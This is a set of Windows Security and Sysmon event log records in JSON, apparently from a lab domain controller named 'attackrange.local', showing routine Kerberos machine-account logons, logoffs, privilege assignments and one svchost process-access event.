{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4217,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:37.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nSourceProcessId: 1216\r\nSourceThreadId: 2604\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:37.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","SourceProcessId":"1216","SourceThreadId":"2604","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220429,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6441D\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6441d","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220430,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x6441D\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50139\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x6441d","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50139","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220431,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6441D\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6441d","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220432,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6448A\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6448a","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220433,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x6448A\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50140\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x6448a","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50140","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220434,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6448A\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6448a","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220435,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x649DF\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x649df","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220436,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x649DF\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50141\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x649df","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50141","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220437,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x649DF\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x649df","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220438,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64A8A\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x64a8a","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220439,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x64A8A\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50142\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x64a8a","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50142","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
